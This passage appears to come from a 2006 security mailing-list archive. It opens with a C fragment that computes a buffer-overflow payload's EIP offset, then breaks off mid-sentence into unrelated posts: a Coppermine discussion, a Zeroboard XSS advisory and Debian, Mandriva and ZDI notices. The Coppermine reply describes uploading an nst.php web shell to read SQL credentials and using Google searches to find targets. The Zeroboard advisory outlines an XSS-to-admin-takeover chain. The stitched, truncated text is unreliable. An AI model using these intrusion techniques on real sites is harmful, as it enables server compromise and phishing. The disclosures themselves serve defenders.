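/* Offset that produced EIP 0x31323334 for the advisory's payload (155). */
long advisory_payload_offset(void)
{
    char payload[160];
    size_t len = advisory_payload(payload);
    return find_eip_offset(payload, len, 0x31323334u);
}

/* Result of feeding the same payload to the hardened copy (-1: rejected). */
int advisory_payload_rejected(void)
{
    char payload[160], port[PORT_BUF_SIZE];
    advisory_payload(payload);
    return safe_set_port(payload, port, sizeof port);
}

int main(void)
{
    char port[PORT_BUF_SIZE];
    printf("EIP 0x31323334 came from payload offset %ld\n",
           advisory_payload_offset());
    printf("safe_set_port(\"3050\") = %d\n",
           safe_set_port("3050", port, sizeof port));
    printf("safe_set_port(advisory payload) = %d\n",
           advisory_payload_rejected());
    return 0;
}
```

The offset finder is the same idea as the pattern-offset tools used in
exploit development; here the payload's own tail makes the search trivial,
but the decoder is what explains why gdb reports 0x31323334 rather than
0x34333231.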

Notes:
~~

 - Various other problems, not discovered by me, have been fixed in the 1.5.3
version. I encourage everyone to upgrade to the newest version as soon as possible.

Patches for the 

Re: Coppermine exploit used by a Chase Phish?

2006-03-13 Thread Nexus
Coppermine is subject to multiple exploits; for the most part
exploiters do not need to have much knowledge of its workings. There is
a script called nst.php which is saved as a rar file and uploaded into
the Coppermine (unless Coppermine is properly configured to not accept
anything but image files). This nst.php script allows them to run a local
account on the system and browse through directories, upload new files, even
access the SQL u/p and the SQL database. There is a good possibility this is
what happened:


some kid hacked the Coppermine using a script similar to nst.php,
uploaded it, got into the server, and simply uploaded the phish script.
Pretty easy to do actually, and a simple Google search for
"[subject], powered by coppermine" will give an extended list of possible
targets for the exploiter to attack.


Paul Laudanski wrote:
I got sent a Chase phish email tonight and in checking it out it appears 
to be live on a Coppermine gallery installation.  Is this a new exploit of 
Coppermine, or just this site hasn't been yet patched?


A photo of the phish site with the URL (domain blacked out):

http://castlecops.com/p728141-Mar_10_Phish_Alerts.html#728141

  




[INetCop Security Advisory] zeroboard IP session bypass XSS vulnerability

2006-03-13 Thread dong-hun you



INetCop Security Advisory #2006-0x82-029



* Title: zeroboard IP session bypass XSS vulnerability


0x01. Description


Zeroboard is a popular web bulletin board used in Korea.

INetCop Security found an XSS vulnerability in the latest Zeroboard version,
4.1 pl 7 (2005. 4. 4).
Zeroboard uses the following logic so that a session cannot be abused by
cookie-based attacks (e.g. cookie spoofing or sniffing).

The part that handles the session after a successful login:
--

bbs/login_check.php:
...
24  // If the member login succeeded, create the session and redirect
25  if($member_data[no]) {
26
27  if($auto_login) {
28  makeZBSessionID($member_data[no]);
29  }
30
31  // Session handling for 4.0x
32  $zb_logged_no = $member_data[no];
33  $zb_logged_time = time();
34  $zb_logged_ip = $REMOTE_ADDR; <--- Recording IP address
35  $zb_last_connect_check = '0';
36
37  session_register(zb_logged_no);
38  session_register(zb_logged_time);
39  session_register(zb_logged_ip);
40  session_register(zb_last_connect_check);
41
--

If the IP address differs from the one recorded in the session, the session
is destroyed:
--

bbs/lib.php:

94  // Check the session values and process the login
95  } elseif($HTTP_SESSION_VARS[zb_logged_no]) {
96
97  // Log out if the login time has exceeded the configured limit or the
    // login IP differs from the current user's IP
98  if(time()-$HTTP_SESSION_VARS[zb_logged_time] > $_zbDefaultSetup[login_time] || $HTTP_SESSION_VARS[zb_logged_ip] != $REMOTE_ADDR) {
99
100  $zb_logged_no = "";   // session initialization
101  $zb_logged_time = "";
102  $zb_logged_ip = "";
103  session_register(zb_logged_no);
104  session_register(zb_logged_ip);
105  session_register(zb_logged_time);
106  session_destroy();
107
108  // If valid, reset the login time
109  } else {
--


This appears to block cookie hijacking. But with an IP-session bypass
technique (making the injected code run in the victim's own browser, so that
every request carries the victim's IP address), the session check can still be
bypassed. A detailed explanation of the way to exploit this vulnerability can
be found in the following reference.

URL: http://x82.inetcop.org/h0me/papers/iframe_tag_exploit.txt (Korean)

As a result, an attacker can get exploit code to run through the
administrator's web browser.


--


0x02. Vulnerable Packages


Vendor site: http://www.nzeo.com/

Zeroboard 4.1 pl 7 (2005. 4. 4) and earlier versions.
-zb41pl7.tar.Z

Disclosure Timeline:
2003-04.??: Vulnerabilities found.
2006-02.17: 1st vendor contact. (didn't respond)
2006-02.22: 2nd vendor contact. (didn't respond)
2006-02.25: Vendor responded, patch released.
2006-03.12: Public disclosure.


0x03. Exploit


We have two proof-of-concept exploits for this vulnerability.

The XSS vulnerability occurs in the memo box title and in the e-mail and
homepage fields of the user information.
When the administrator logs in and views a user's information page, the
injected code executes; the other way is to inject the attack code into a
memo title.
Once the code runs, the attacker can inject PHP code through an
administrator-only page function.
Through this PHP code injection, the attacker (a normal user) can change the
administrator's password and take over the administrator's privileges.

To prevent the abuse of this vulnerabilty, INetCop Security will not publish 
POC code.


0x04. Patch


INetCop Security released temporary patch:
INetCop Security Patch URL: 
http://inetcop.net/upfiles/Zeroboard-4.1_pl7_patch.tgz

And vendor's patch after INetCop Security advisory:
Vendor Patch URL: http://www.nzeo.com/bbs/zboard.php?id=cgi_bugreport2no=5406

--
Thank you.

P.S.: Thanks to Securityproof for the translation.
Korean Advisory URL: 
http://www.inetcop.org/upfiles/33INCSA.2006-0x82-029-zeroboard.pdf


--
By dong-houn yoU (Xpl017Elz), in INetCop(c) Security.

MSN  E-mail: szoahc(at)hotmail(dot)com,
  xploit(at)hackermail(dot)com

INetCop Security Home: http://www.inetcop.org
 My World: http://x82.inetcop.org

GPG public key: http://x82.inetcop.org/h0me/pr0file/x82.k3y
--




-- 
___
Get your free email from http://www.hackermail.com


[SECURITY] [DSA 997-1] New bomberclone packages fix arbitrary code execution

2006-03-13 Thread Martin Schulze
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 997-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
March 13th, 2006http://www.debian.org/security/faq
- --

Package: bomberclone
Vulnerability  : buffer overflows
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2006-0460
BugTraq ID : 16697

Stefan Cornelius of Gentoo Security discovered that bomberclone, a
free Bomberman-like game, crashes when receiving overly long error
packets, which may also allow remote attackers to execute arbitrary
code.

The old stable distribution (woody) does not contain bomberclone packages.

For the stable distribution (sarge) these problems have been fixed in
version 0.11.5-1sarge1.

For the unstable distribution (sid) these problems have been fixed in
version 0.11.6.2-1.

We recommend that you upgrade your bomberclone package.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

  Source archives:


http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1.dsc
  Size/MD5 checksum:  668 e59985e92646e66e09f0c904cc777e82

http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1.diff.gz
  Size/MD5 checksum: 6985 a9d9696db932b11774b839d2b765fd31

http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5.orig.tar.gz
  Size/MD5 checksum:  7985803 cd2834d68980dd506038db44728cd2b1

  Architecture independent components:


http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone-data_0.11.5-1sarge1_all.deb
  Size/MD5 checksum:  7586908 c869506540ddfc25d3c452f32350d4ff

  Alpha architecture:


http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_alpha.deb
  Size/MD5 checksum:   128338 d97db6f509a94124fab9e20cdcabb2a4

  AMD64 architecture:


http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_amd64.deb
  Size/MD5 checksum:   114644 827f5f7850204fd2166a34258f17a71d

  ARM architecture:


http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_arm.deb
  Size/MD5 checksum:   117114 3e0cf308c1cb3a93a032eddfb7331f9c

  Intel IA-32 architecture:


http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_i386.deb
  Size/MD5 checksum:95614 626662760c83f79e2119e7e896970d4f

  Intel IA-64 architecture:


http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_ia64.deb
  Size/MD5 checksum:   171882 ed2ef72266943a1cc789f3b6f0ba7358

  HP Precision architecture:


http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_hppa.deb
  Size/MD5 checksum:   107690 383b107de7545ced60bb5afa38b4ed92

  Motorola 680x0 architecture:


http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_m68k.deb
  Size/MD5 checksum:94488 32dc2741532866a837e1a6c8d7909b06

  Big endian MIPS architecture:


http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_mips.deb
  Size/MD5 checksum:   116202 e8c5cb65dfcfd70ffe8b6320188a6728

  Little endian MIPS architecture:


http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_mipsel.deb
  Size/MD5 checksum:   116026 29263ffcbf426c911e0b3d8a034a9b92

  PowerPC architecture:


http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_powerpc.deb
  Size/MD5 checksum:   101888 0813f5ce3091cb8b7d482221c6b0a98f

  IBM S/390 architecture:


http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_s390.deb
  Size/MD5 checksum:   113050 b5298b8a579f76f1fd0751a64f2835d3

  Sun Sparc architecture:


http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_sparc.deb
  Size/MD5 checksum:   102884 72313829a57423a10dd1d200775c9f0d


  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: 

[ MDKSA-2006:055 ] - Updated gnupg packages fix signature file verification vulnerability

2006-03-13 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2006:055
 http://www.mandriva.com/security/
 ___
 
 Package : gnupg
 Date: March 13, 2006
 Affected: 10.2, 2006.0, Corporate 3.0, Multi Network Firewall 2.0
 ___
 
 Problem Description:
 
 Another vulnerability, different from that fixed in MDKSA-2006:043
 (CVE-2006-0455), was discovered in gnupg in the handling of signature
 files.
 
 This vulnerability is corrected in gnupg 1.4.2.2 which is being
 provided with this update.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0049
 ___
 
 Updated Packages:
 
 Mandriva Linux 10.2:
 78bc5edadc4c09cc79301e92e769792b  10.2/RPMS/gnupg-1.4.2.2-0.1.102mdk.i586.rpm
 a64138f15d9d24c9fd342a9d58739629  10.2/SRPMS/gnupg-1.4.2.2-0.1.102mdk.src.rpm

 Mandriva Linux 10.2/X86_64:
 921557b980e6831d91f67c1be03ff221  
x86_64/10.2/RPMS/gnupg-1.4.2.2-0.1.102mdk.x86_64.rpm
 a64138f15d9d24c9fd342a9d58739629  
x86_64/10.2/SRPMS/gnupg-1.4.2.2-0.1.102mdk.src.rpm

 Mandriva Linux 2006.0:
 ff09cfa3b8f71b9e5ddf4a7639696b9d  
2006.0/RPMS/gnupg-1.4.2.2-0.1.20060mdk.i586.rpm
 22b6b9305f47570652dc276cf8f18401  
2006.0/SRPMS/gnupg-1.4.2.2-0.1.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 388c4bca33be3cccb9a44e87b1a34964  
x86_64/2006.0/RPMS/gnupg-1.4.2.2-0.1.20060mdk.x86_64.rpm
 22b6b9305f47570652dc276cf8f18401  
x86_64/2006.0/SRPMS/gnupg-1.4.2.2-0.1.20060mdk.src.rpm

 Corporate 3.0:
 cd7fbec4de29eabcc31fdeb90e05f674  
corporate/3.0/RPMS/gnupg-1.4.2.2-0.1.C30mdk.i586.rpm
 54fa6da091d1124b661a9fbc4f21abe1  
corporate/3.0/SRPMS/gnupg-1.4.2.2-0.1.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 f43a3a505f7874324542f16398243786  
x86_64/corporate/3.0/RPMS/gnupg-1.4.2.2-0.1.C30mdk.x86_64.rpm
 54fa6da091d1124b661a9fbc4f21abe1  
x86_64/corporate/3.0/SRPMS/gnupg-1.4.2.2-0.1.C30mdk.src.rpm

 Multi Network Firewall 2.0:
 3a998c3c9451bba3ac118df3a8b74955  
mnf/2.0/RPMS/gnupg-1.4.2.2-0.1.M20mdk.i586.rpm
 18cfe29d05e64e08c77bab8683517798  
mnf/2.0/SRPMS/gnupg-1.4.2.2-0.1.M20mdk.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFEFcoumqjQ0CJFipgRAo0CAKCTHjbpAjG4GONKzPzHGja45wyVAgCgyApo
91TxmG2szENod45PnFctWyg=
=5TQS
-END PGP SIGNATURE-



ZDI-06-003: Ipswitch Collaboration Suite Code Execution Vulnerability

2006-03-13 Thread zdi-disclosures
ZDI-06-003: Ipswitch Collaboration Suite Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-003.html
March 13, 2006

-- CVE ID:
CVE-2005-3526

-- Affected Vendor:
Ipswitch

-- Affected Products:
Ipswitch Collaboration Suite 2006.02 and below

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since December 13, 2005 by Digital Vaccine protection
filter ID 3982. For further product information on the TippingPoint IPS:

http://www.tippingpoint.com 

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Ipswitch Collaboration Suite.
Authentication is required to exploit this vulnerability.

This specific flaw exists within the IMAP daemon. A lack of bounds
checking during the parsing of long arguments to the FETCH verb can
result in an exploitable buffer overflow.

-- Vendor Response:
From http://www.ipswitch.com/support/ics/updates/ics200603prem.asp:

IMAP: Corrected a vulnerability issue where a properly crafted Fetch
command causes IMAP to crash with a buffer overflow (disclosed by
TippingPoint, a division of 3Com). 

-- Disclosure Timeline:
2005.12.13 - Vulnerability reported to vendor
2005.12.13 - Digital Vaccine released to TippingPoint customers
2006.03.13 - Public release of advisory

-- Credit:
This vulnerability was discovered by Manuel Santamarina Suarez aka 
'FistFuXXer'.

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative
(ZDI) represents a best-of-breed model for rewarding security
researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used.
3Com does not re-sell the vulnerability details or any exploit code.
Instead, upon notifying the affected product vendor, 3Com provides its
customers with zero day protection through its intrusion prevention
technology. Explicit details regarding the specifics of the
vulnerability are not exposed to any parties until an official vendor
patch is publicly available. Furthermore, with the altruistic aim of
helping to secure a broader user base, 3Com provides this vulnerability
information confidentially to security vendors (including competitors)
who have a vulnerability protection or mitigation product.